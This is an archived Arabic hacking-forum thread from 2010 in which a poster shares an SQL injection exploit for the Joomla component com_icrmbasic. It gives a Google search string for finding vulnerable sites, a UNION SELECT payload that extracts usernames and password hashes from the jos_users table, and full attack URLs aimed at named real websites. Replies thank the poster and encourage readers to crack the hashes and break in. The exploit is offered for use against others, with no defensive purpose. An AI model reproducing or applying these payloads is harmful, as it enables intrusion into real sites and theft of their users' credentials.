:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   ثغرة في سكربت Joomla Component com_ircmbasic (http://www.vbspiders.com/vb/t23480.html)

MATRIX ALGERIA 01-06-2010 12:34 AM
ثغرة في سكربت Joomla Component com_ircmbasic
 
السلام عليكم ايها العناكب ان شاء الله جاهزين للثغرة جديدة
------
نبدا باسم الله

اولا نروح على قووقل
www.google.com

نقوم بالبحث على
كود PHP:
 inurl:"com_icrmbasic" 
سوف تخرج مواقع كثيرة مالعمل اذا....اهه الاستغلال


كود PHP:
-10+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12
,13,14,15,16,17,18,19,20,21,22,23,24+from+jos_users-- 
يعني يصبح الموقع على الشكل التالي

كود PHP:
http://www.isygen.com/index.php?option=com_icrmbasicdemo&v672=Contacts&v669
=v694&v675=oab&v660=main&v656=-10+union+select+1,concat_ws(0x3a,username,pa
ssword),3,password,username,6,7,8,9,10,11,12,13,14,15,16,17,18,19,version()
tukulesto,21,22,23,24+from+jos_users--&v658=en-GB&Itemid=483 

اليكم مثال مجرب عليه

http://www.cosmohotel.ro/index.php?o...p1=m7&Itemid=2









الموضوع الاصلي : الشبكة العنكبوتية الاحترافية الشرح من اعداد matrix algeria
نرجو حفظ الحقوق

KaLa$nikoV 01-06-2010 02:46 AM
ماشاء الله عليك

مشكور ع الثغره

يلا فكو هاشات واخترقو

M!M0 01-06-2010 04:44 PM
مشكووور على الطرح أخي

Hαcĸer'ѕ Kιɴɢ 04-07-2010 03:11 AM
موفق بإذن الله ... لك مني أجمل تحية .

Dr.NaNo 04-07-2010 11:22 AM
مشكور ياغالي على الثغرة .

تحياتي لك


الساعة الآن 05:36 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0